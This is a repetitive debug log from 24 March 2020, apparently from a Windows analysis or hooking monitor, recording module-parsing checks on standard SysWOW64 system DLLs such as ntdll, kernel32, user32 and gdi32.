2020-03-24 10:13:47,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,858 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,858 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,936 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,936 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,950 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:47,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:47,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,013 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,013 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,013 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,138 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,154 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,154 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,170 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,170 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,232 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,232 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,247 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,247 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,247 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,279 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,293 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,293 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,293 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:48,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:48,309 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:48,325 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:48,325 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:48,341 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:48,341 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:48,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:48,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:48,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:48,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,482 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,482 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,482 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,482 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,513 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:48,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:48,528 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,543 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,543 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,543 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:48,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:48,559 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:48,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:48,559 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:48,575 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:48,575 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:48,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:48,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,716 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,716 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,716 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,793 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,793 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
